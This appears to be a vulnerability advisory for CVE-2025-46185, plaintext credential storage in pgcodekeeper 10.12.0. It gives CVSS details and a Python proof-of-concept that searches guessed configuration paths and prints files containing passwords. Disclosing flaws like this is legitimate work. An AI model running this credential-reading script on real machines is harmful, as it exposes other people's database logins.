An Insecure Permission vulnerability in pgcodekeeper 10.12.0 allows a local attacker to obtain sensitive information via the plaintext storage of passwords and usernames.
CVSS Details
CVSS Score
6.2
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Configurations (Affected Products)
No configuration data available.
pgcodekeeper 10.12.0
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-46185 PoC - pgcodekeeper明文凭证泄露
# 攻击者需要本地访问权限
import os
import json
from pathlib import Path
def find_pgcodekeeper_config():
"""查找pgcodekeeper配置文件位置"""
config_paths = [
os.path.expanduser("~/.pgcodekeeper/config.json"),
os.path.expanduser("~/.pgcodekeeper/connections.json"),
os.path.expanduser("~/.pgcodekeeper/settings.xml"),
os.path.expanduser("~/.pgcodekeeper/credentials.properties"),
os.path.expanduser("~/.config/pgcodekeeper/config.json"),
os.path.expanduser("~/.local/share/pgcodekeeper/config.json"),
]
found_credentials = []
for path in config_paths:
if os.path.exists(path):
print(f"[+] Found config file: {path}")
try:
with open(path, 'r') as f:
content = f.read()
# Check for plaintext credentials
if 'password' in content.lower() or 'username' in content.lower():
print(f"[!] Potential credentials found in {path}")
found_credentials.append({
'path': path,
'content': content
})
except Exception as e:
print(f"[-] Error reading {path}: {e}")
return found_credentials
def main():
print("=== CVE-2025-46185 PoC ===")
print("pgcodekeeper Plaintext Credential Storage\n")
credentials = find_pgcodekeeper_config()
if credentials:
print(f"\n[!] Found {len(credentials)} potential credential file(s)")
for cred in credentials:
print(f"\nFile: {cred['path']}")
print("Content preview:")
print(cred['content'][:500])
else:
print("[-] No pgcodekeeper config files found")
if __name__ == "__main__":
main()